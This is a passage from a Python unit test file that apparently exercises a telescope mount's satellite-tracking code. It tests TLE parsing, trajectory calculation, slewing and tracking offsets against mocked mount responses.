def test_l0_1(self):
tleParams = TLEParams()
tleParams.l0 = 'test'
assert tleParams.l0 == 'test'
def test_l1_1(self):
tleParams = TLEParams()
tleParams.l1 = 'test'
assert tleParams.l1 == 'test'
def test_l2_1(self):
tleParams = TLEParams()
tleParams.l2 = 'test'
assert tleParams.l2 == 'test'
def test_name_1(self):
tleParams = TLEParams()
tleParams.name = 'test'
assert tleParams.name == 'test'
def test_TP_flip_1(self):
trajectoryParams = TrajectoryParams()
trajectoryParams.flip = None
assert trajectoryParams.flip is None
def test_TP_flip_2(self):
trajectoryParams = TrajectoryParams()
trajectoryParams.flip = 'F'
assert trajectoryParams.flip
def test_TP_flip_3(self):
trajectoryParams = TrajectoryParams()
trajectoryParams.flip = 'x'
assert not trajectoryParams.flip
def test_TP_flip_4(self):
trajectoryParams = TrajectoryParams()
trajectoryParams.flip = False
assert not trajectoryParams.flip
def test_TP_jdStart_1(self):
trajectoryParams = TrajectoryParams()
trajectoryParams.jdStart = None
assert trajectoryParams.jdStart is None
def test_TP_jdStart_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
trajectoryParams = TrajectoryParams(obsSite=ObsSite())
trajectoryParams.jdStart = '100'
assert trajectoryParams.jdStart.tt == 169
def test_TP_jdEnd_1(self):
trajectoryParams = TrajectoryParams()
trajectoryParams.jdEnd = None
assert trajectoryParams.jdEnd is None
def test_TP_jdEnd_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
trajectoryParams = TrajectoryParams(obsSite=ObsSite())
trajectoryParams.jdEnd = '100'
assert trajectoryParams.jdEnd.tt == 169
def test_TR_message_1(self):
trajectoryParams = TrajectoryParams()
trajectoryParams.message = None
assert trajectoryParams.message is None
def test_TR_message_2(self):
trajectoryParams = TrajectoryParams()
trajectoryParams.message = 'test'
assert trajectoryParams.message == 'test'
def test_parseGetTLE_1(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
t0 = 'NOAA 8 [-] '
t1 = '1 13923U 83022A 19185.92877216 -.00000021 00000-0 89876-5 0 9996'
t2 = '2 13923 98.5823 170.9975 0016143 125.4216 234.8476 14.28676129888407'
cont = '$0A'
response = [t0 + cont + t1 + cont + t2 + cont]
suc = sat.parseGetTLE(response, 1)
self.assertTrue(suc)
self.assertEqual(sat.tleParams.name, 'NOAA 8 [-]')
self.assertEqual(sat.tleParams.l0, t0)
self.assertEqual(sat.tleParams.l1, t1)
self.assertEqual(sat.tleParams.l2, t2)
def test_parseGetTLE_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
response = ['76129888407$0A']
suc = sat.parseGetTLE(response, 1)
self.assertFalse(suc)
self.assertEqual(sat.tleParams.name, None)
self.assertEqual(sat.tleParams.l0, None)
self.assertEqual(sat.tleParams.l1, None)
self.assertEqual(sat.tleParams.l2, None)
def test_parseGetTLE_3(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
response = ['76129888407$0A', ['hj']]
suc = sat.parseGetTLE(response, 1)
self.assertFalse(suc)
self.assertEqual(sat.tleParams.name, None)
self.assertEqual(sat.tleParams.l0, None)
self.assertEqual(sat.tleParams.l1, None)
self.assertEqual(sat.tleParams.l2, None)
def test_getTLE_1(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
t0 = 'NOAA 8 [-] '
t1 = '1 13923U 83022A 19185.92877216 -.00000021 00000-0 89876-5 0 9996'
t2 = '2 13923 98.5823 170.9975 0016143 125.4216 234.8476 14.28676129888407'
cont = '$0A'
response = [t0 + cont + t1 + cont + t2 + cont]
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = False, response, 1
suc = sat.getTLE()
self.assertFalse(suc)
def test_getTLE_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
t0 = 'NOAA 8 [-] '
t1 = '1 13923U 83022A 19185.92877216 -.00000021 00000-0 89876-5 0 9996'
t2 = '2 13923 98.5823 170.9975 0016143 125.4216 234.8476 14.28676129888407'
cont = '$0A'
response = [t0 + cont + t1 + cont + t2 + cont]
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, response, 1
suc = sat.getTLE()
self.assertTrue(suc)
def test_getTLE_3(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
t0 = 'NOAA 8 [-] '
t1 = '1 13923U 83022A 19185.92877216 -.00000021 00000-0 89876-5 0 9996'
t2 = '2 13923 98.5823 170.9975 0016143 125.4216 234.8476 14.28676129888407'
cont = '$0A'
response = [t0 + cont + t1 + cont + t2 + cont]
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, response, 2
suc = sat.getTLE()
self.assertFalse(suc)
def test_getTLE_4(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, 'E', 1
suc = sat.getTLE()
self.assertFalse(suc)
def test_getTLE_5(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, ['V', 'V'], 2
suc = sat.getTLE()
self.assertFalse(suc)
def test_setTLE_1(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = False, 'E', 1
suc = sat.setTLE()
self.assertFalse(suc)
def test_setTLE_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, 'E', 1
suc = sat.setTLE()
self.assertFalse(suc)
def test_setTLE_3(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, 'V', 1
suc = sat.setTLE()
self.assertFalse(suc)
def test_setTLE_4(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
t0 = 'NOAA 8 [-] '
t1 = '1 13923U 83022A 19185.92877216 -.00000021 00000-0 89876-5 0 9996'
t2 = '2 13923 98.5823 170.9975 0016143 125.4216 234.8476 14.28676129888407'
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, 'V', 1
suc = sat.setTLE(line0=t0,
line1=t1,
line2=t2)
self.assertTrue(suc)
def test_setTLE_5(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
t0 = 'NOAA 8 [-] '
t1 = '1 13923U 83022A 19185.92877216 -.00000021 00000-0 89876-5 0 9996'
t2 = '2 13923 98.5823 170.9975 0016143 125.4216 234.8476 14.28676129888407x'
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, 'V', 1
suc = sat.setTLE(line0=t0,
line1=t1,
line2=t2)
self.assertFalse(suc)
def test_setTLE_6(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
t0 = 'NOAA 8 [-] '
t1 = '1 13923U 83022A 19185.92877216 -.00000021 00000-0 89876-5 0 9996x'
t2 = '2 13923 98.5823 170.9975 0016143 125.4216 234.8476 14.28676129888407'
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, 'V', 1
suc = sat.setTLE(line0=t0,
line1=t1,
line2=t2)
self.assertFalse(suc)
def test_setTLE_7(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
t0 = 'NOAA 8 [-] '
t1 = '1 13923U 83022A 19185.92877216 -.00000021 00000-0 89876-5 0 9996'
t2 = '2 13923 98.5823 170.9975 0016143 125.4216 234.8476 14.28676129888407'
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = False, 'V', 1
suc = sat.setTLE(line0=t0,
line1=t1,
line2=t2)
self.assertFalse(suc)
def test_setTLE_8(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
t0 = 'NOAA 8 [-] '
t1 = '1 13923U 83022A 19185.92877216 -.00000021 00000-0 89876-5 0 9996'
t2 = '2 13923 98.5823 170.9975 0016143 125.4216 234.8476 14.28676129888407'
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, 'E', 1
suc = sat.setTLE(line0=t0,
line1=t1,
line2=t2)
self.assertFalse(suc)
def test_setTLE_9(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
t0 = 'NOAA 8 [-] '
t1 = '1 13923U 83022A 19185.92877216 -.00000021 00000-0 89876-5 0 9996'
t2 = '2 13923 98.5823 170.9975 0016143 125.4216 234.8476 14.28676129888407'
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, 'V', 2
suc = sat.setTLE(line0=t0,
line1=t1,
line2=t2)
self.assertFalse(suc)
def test_parseCalcTLE_1(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
response = ''
suc = sat.parseCalcTLE(response, 1)
self.assertFalse(suc)
def test_parseCalcTLE_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
response = ''
suc = sat.parseCalcTLE(response, 3)
self.assertFalse(suc)
def test_parseCalcTLE_3(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
response = []
suc = sat.parseCalcTLE(response, 3)
self.assertFalse(suc)
def test_parseCalcTLE_4(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
response = ['E', 'E', 'E']
suc = sat.parseCalcTLE(response, 3)
self.assertFalse(suc)
def test_parseCalcTLE_5(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
s0 = ''
s1 = ''
s2 = ''
response = [s0, s1, s2]
suc = sat.parseCalcTLE(response, 3)
self.assertFalse(suc)
def test_parseCalcTLE_6(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
s0 = '+23.12334,123.1234'
s1 = '12.12345,+12.1234'
s2 = 'F'
response = [s0, s1, s2]
suc = sat.parseCalcTLE(response, 3)
self.assertTrue(suc)
def test_parseCalcTLE_7(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
s0 = '+23.12334,123.1234'
s1 = '12.12345,+12.1234'
s2 = '12345678.1, 12345678.2, F'
response = [s0, s1, s2]
suc = sat.parseCalcTLE(response, 3)
self.assertTrue(suc)
def test_parseCalcTLE_8(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
s0 = 'E'
s1 = ''
s2 = ''
response = [s0, s1, s2]
suc = sat.parseCalcTLE(response, 3)
self.assertFalse(suc)
def test_parseCalcTLE_9(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
s0 = ''
s1 = 'E'
s2 = ''
response = [s0, s1, s2]
suc = sat.parseCalcTLE(response, 3)
self.assertFalse(suc)
def test_parseCalcTLE_10(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
s0 = ''
s1 = ''
s2 = 'E'
response = [s0, s1, s2]
suc = sat.parseCalcTLE(response, 3)
self.assertFalse(suc)
def test_parseCalcTLE_11(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
s0 = ''
s1 = ''
s2 = ''
response = [s0, s1, s2, s2]
suc = sat.parseCalcTLE(response, 4)
self.assertFalse(suc)
def test_parseCalcTLE_12(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
s0 = '+23.12334,123.1234'
s1 = '12.12345'
s2 = 'N'
response = [s0, s1, s2]
suc = sat.parseCalcTLE(response, 3)
self.assertFalse(suc)
def test_parseCalcTLE_13(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
s0 = '+23.12334,123.1234'
s1 = '12.12345,+12.1234'
s2 = 'F,s'
response = [s0, s1, s2]
suc = sat.parseCalcTLE(response, 3)
self.assertFalse(suc)
def test_calcTLE_0(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
ts = load.timescale()
julD = ts.tt_jd(1234567.8)
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = False, 'E', 1
suc = sat.calcTLE(julD=1234567.8)
self.assertFalse(suc)
def test_calcTLE_1(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
ts = load.timescale()
julD = ts.tt_jd(1234567.8)
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = False, 'E', 1
suc = sat.calcTLE(julD=julD)
self.assertFalse(suc)
def test_calcTLE_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = False, 'V', 1
suc = sat.calcTLE(julD=1234567.8)
self.assertFalse(suc)
def test_calcTLE_3(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, 'V', 1
suc = sat.calcTLE(julD=1234567.8)
self.assertFalse(suc)
def test_calcTLE_4(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
s0 = '+23.12334,123.1234'
s1 = '12.12345,+12.1234'
s2 = '12345678.1, 12345678.2, F'
response = [s0, s1, s2]
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, response, 1
suc = sat.calcTLE(julD=1234567.8)
self.assertFalse(suc)
def test_calcTLE_5(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
s0 = '+23.12334,123.1234'
s1 = '12.12345,+12.1234'
s2 = '12345678.1, 12345678.2, F'
response = [s0, s1, s2]
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, response, 3
suc = sat.calcTLE(julD=1234567.8)
self.assertTrue(suc)
def test_calcTLE_6(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
s0 = '+23.12334,123.1234'
s1 = '12.12345,+12.1234'
s2 = '12345678.1, 12345678.2, F'
response = [s0, s1, s2]
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, response, 3
suc = sat.calcTLE()
self.assertFalse(suc)
def test_calcTLE_7(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
s0 = '+23.12334,123.1234'
s1 = '12.12345,+12.1234'
s2 = '12345678.1, 12345678.2, F'
response = [s0, s1, s2]
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, response, 3
suc = sat.calcTLE(julD=1234567.8, duration=0)
self.assertFalse(suc)
def test_getCoordsFromTLE_0(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
suc = sat.getCoordsFromTLE()
self.assertFalse(suc)
def test_getCoordsFromTLE_1(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
ts = load.timescale()
julD = ts.tt_jd(1234567.8)
sat = Satellite(parent=Parent())
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = False, 'E', 1
suc = sat.getCoordsFromTLE(julD=julD)
self.assertFalse(suc)
def test_getCoordsFromTLE_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = False, 'E', 1
suc = sat.getCoordsFromTLE(julD=1234567.8)
self.assertFalse(suc)
def test_getCoordsFromTLE_3(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
response = ['E', 'E']
ret = (True, response, 2)
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = ret
suc = sat.getCoordsFromTLE(julD=1234567.8)
self.assertFalse(suc)
def test_getCoordsFromTLE_4(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
response = ['10.0, 10.0', 'E']
ret = (True, response, 2)
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = ret
suc = sat.getCoordsFromTLE(julD=1234567.8)
self.assertFalse(suc)
def test_getCoordsFromTLE_5(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
response = ['10.0, 10.0', '10.0, 10.0']
ret = (True, response, 2)
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = ret
suc = sat.getCoordsFromTLE(julD=1234567.8)
self.assertTrue(suc)
def test_slewTLE_1(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = False, 'E', 1
suc, mes = sat.slewTLE()
self.assertFalse(suc)
def test_slewTLE_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, 'X', 1
suc, mes = sat.slewTLE()
self.assertTrue(suc)
self.assertEqual(mes, 'Error')
def test_slewTLE_3(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, 'V', 1
suc, mes = sat.slewTLE()
self.assertTrue(suc)
self.assertEqual(mes, 'Slewing to start and track')
def test_slewTLE_4(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, 'V', 2
suc, mes = sat.slewTLE()
self.assertFalse(suc)
def test_parseStatTLE_1(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
response = ''
suc = sat.parseStatTLE(response, 3)
self.assertFalse(suc)
def test_parseStatTLE_2(self):
class Parent:
obsSite = None
sat = Satellite(parent=Parent())
response = ''
suc = sat.parseStatTLE(response, 1)
self.assertFalse(suc)
def test_parseStatTLE_3(self):
class Parent:
obsSite = None
sat = Satellite(parent=Parent())
response = ['']
suc = sat.parseStatTLE(response, 1)
self.assertFalse(suc)
self.assertEqual(sat.tleParams.message, None)
def test_parseStatTLE_4(self):
class Parent:
obsSite = None
sat = Satellite(parent=Parent())
response = ['X']
suc = sat.parseStatTLE(response, 1)
self.assertTrue(suc)
self.assertEqual(sat.tleParams.message, 'Error')
def test_parseStatTLE_5(self):
class Parent:
obsSite = None
sat = Satellite(parent=Parent())
response = ['V']
suc = sat.parseStatTLE(response, 1)
self.assertTrue(suc)
self.assertEqual(sat.tleParams.message, 'Slewing to the start of the transit')
def test_parseStatTLE_6(self):
class Parent:
obsSite = None
sat = Satellite(parent=Parent())
response = ['V', 'E']
suc = sat.parseStatTLE(response, 2)
self.assertFalse(suc)
def test_statTLE_1(self):
class Parent:
obsSite = None
sat = Satellite(parent=Parent())
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = False, 'E', 1
suc = sat.statTLE()
self.assertFalse(suc)
def test_statTLE_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, 'E', 1
suc = sat.statTLE()
self.assertTrue(suc)
def test_startProgTrajectory_1(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (False, ['V'], 1)
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.startProgTrajectory()
assert not suc
def test_startProgTrajectory_2(self):
ts = load.timescale()
julD = ts.tt_jd(12345678)
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (False, ['V'], 1)
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.startProgTrajectory(julD=julD)
assert not suc
def test_startProgTrajectory_3(self):
ts = load.timescale()
julD = ts.tt_jd(12345678)
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (True, ['V'], 2)
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.startProgTrajectory(julD=julD)
assert not suc
def test_startProgTrajectory_4(self):
ts = load.timescale()
julD = ts.tt_jd(12345678)
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (True, ['V', 'V'], 2)
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.startProgTrajectory(julD=julD)
assert not suc
def test_startProgTrajectory_5(self):
ts = load.timescale()
julD = ts.tt_jd(12345678)
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (True, ['E'], 1)
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.startProgTrajectory(julD=julD)
assert not suc
def test_startProgTrajectory_6(self):
ts = load.timescale()
julD = ts.tt_jd(12345678)
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (True, ['V'], 1)
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.startProgTrajectory(julD=julD)
assert suc
def test_progTrajectoryData_1(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (True, ['V'], 1)
alt = [10, 20, 30]
az = [40, 50, 60]
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.progTrajectory()
assert not suc
def test_progTrajectoryData_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (True, ['V'], 1)
alt = [10, 20, 30]
az = [40, 50]
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.progTrajectory(alt=alt, az=az)
assert not suc
def test_progTrajectoryData_3(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (False, ['1', '2'], 1)
alt = [10, 20, 30]
az = [40, 50, 60]
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.progTrajectory(alt=alt, az=az)
assert not suc
def test_progTrajectoryData_4(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (True, ['1', '2'], 1)
alt = [10, 20, 30]
az = [40, 50, 60]
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.progTrajectory(alt=alt, az=az)
assert not suc
def test_progTrajectoryData_5(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (True, ['1', '2'], 2)
alt = [10, 20, 30]
az = [40, 50, 60]
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.progTrajectory(alt=alt, az=az)
assert not suc
def test_progTrajectoryData_6(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (True, ['1', '2', 'E'], 3)
alt = [10, 20, 30]
az = [40, 50, 60]
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.progTrajectory(alt=alt, az=az)
assert not suc
def test_progTrajectoryData_7(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (True, ['1', '2', '3'], 3)
alt = [10, 20, 30]
az = [40, 50, 60]
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.progTrajectory(alt=alt, az=az)
assert suc
def test_calcTrajectory_1(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (False, ['V'], 1)
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.calcTrajectory()
assert not suc
def test_calcTrajectory_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (False, ['V'], 1)
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.calcTrajectory(replay=True)
assert not suc
def test_calcTrajectory_3(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (True, ['V'], 2)
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.calcTrajectory()
assert not suc
def test_calcTrajectory_4(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (True, ['V', 'V'], 2)
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.calcTrajectory()
assert not suc
def test_calcTrajectory_5(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (True, ['E'], 1)
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.calcTrajectory()
assert not suc
def test_calcTrajectory_6(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (True, ['10, 10, F, F'], 1)
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.calcTrajectory()
assert not suc
def test_calcTrajectory_7(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (True, ['10, 10, F'], 1)
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.calcTrajectory()
assert suc
def test_getTrackingOffsets_1(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
suc = sat.getTrackingOffsets()
self.assertFalse(suc)
def test_getTrackingOffsets_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(True, [1, 2, 3], 1)):
suc = sat.getTrackingOffsets()
self.assertFalse(suc)
def test_getTrackingOffsets_3(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(True, [1, 2, 3], 3)):
suc = sat.getTrackingOffsets()
self.assertFalse(suc)
def test_getTrackingOffsets_4(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(True, [1, 2, 3, 4], 4)):
suc = sat.getTrackingOffsets()
self.assertTrue(suc)
def test_setTrackingOffsets_1(self):
class ObsSite:
UTC2TT = 69
